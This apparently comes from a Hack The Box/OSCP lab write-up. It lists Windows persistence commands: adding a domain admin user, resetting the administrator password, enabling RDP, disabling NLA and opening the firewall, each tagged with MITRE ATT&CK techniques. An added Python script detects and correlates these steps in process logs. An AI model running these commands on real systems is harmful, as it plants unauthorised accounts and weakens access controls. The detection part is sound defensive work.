Vonnie Hudson
How To Hack The Box To Your OSCP (The Bonus Boxes)

================================
IMPACT: Persistence
--------------------------------
whoami
net user vonnie Password-123! /add /domain
net localgroup Administrators "Remote Desktop Users" /add vonnie
net user vonnie "Password-123!"

# MITRE ATT&CK T1098 Persistence: Account Manipulation
net user administrator "Password-123!"

# enable RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# turn off NLA
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f

# MITRE ATT&CK DEFENSE EVASION: T1562.004: Impair Defenses: Disable System Firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

# MITRE ATT&CK Lateral Movement: T1021.001: Remote Services RDP
sudo rdesktop -u SCRM\\administrator -p Password-123! scrm.local
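
Detection view of the commands above, as an added example that is not part of the original notes: it matches process-creation command lines (the kind recorded by Windows event 4688 or Sysmon event 1 when command-line logging is on) against patterns for each step and flags hosts where several steps occur together. The rule names, host names, account name, password and threshold are assumptions made for illustration, and the sample events are constructed.

```python
import re

NET = r"\bnet1?(?:\.exe)?\s+"
REG_ADD = r"\breg(?:\.exe)?\s+add\b.*"
ZERO = r'.*\s/d\s+"?0"?(?:\s|$)'   # value data of 0, quoted or not

# Rule names are labels chosen for this example; patterns follow the commands in the notes.
RULES = {
    "account_created": re.compile(NET + r"user\b.*\s/add\b", re.I),
    "group_member_added": re.compile(NET + r"localgroup\b.*\s/add\b", re.I),
    # "net user <name> <password>" without /add resets an existing account's password.
    "password_reset": re.compile(r"^(?!.*\s/add\b).*" + NET + r"user\s+\S+\s+(?!/)\S+", re.I),
    "rdp_enabled": re.compile(REG_ADD + r"Terminal Server.*fDenyTSConnections" + ZERO, re.I),
    "nla_disabled": re.compile(REG_ADD + r"WinStations\\RDP-Tcp.*UserAuthentication" + ZERO, re.I),
    "rdp_firewall_opened": re.compile(
        r"\bnetsh(?:\.exe)?\s+advfirewall\s+firewall\s+set\s+rule\b"
        r'.*group="?remote desktop"?.*\benable=yes\b', re.I),
}

# Constructed (host, command line) events; not taken from a real system.
EVENTS = [
    ("WS01", r'net user svc_test Example-Pass1! /add /domain'),
    ("WS01", r'net localgroup Administrators svc_test /add'),
    ("WS01", r'C:\Windows\System32\net.exe user administrator "Example-Pass1!"'),
    ("WS01", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("WS01", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d "0" /f'),
    ("WS01", r'netsh advfirewall firewall set rule group="remote desktop" new enable=yes'),
    ("WS02", r'net user svc_test /domain'),  # benign account lookup
    ("WS02", r'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections'),
    ("WS02", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f'),
]

def classify(cmdline):
    """Return the names of all rules the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def correlate(events, threshold=3):
    """Collect rule hits per host; keep hosts with at least `threshold` distinct rules."""
    hits = {}
    for host, cmd in events:
        hits.setdefault(host, set()).update(classify(cmd))
    return {h: sorted(r) for h, r in hits.items() if len(r) >= threshold}

if __name__ == "__main__":
    for host, rules in correlate(EVENTS).items():
        print(host, rules)
```

Any single rule fires on routine administration too, so the per-host correlation of account changes with RDP, NLA and firewall changes is the signal worth alerting on.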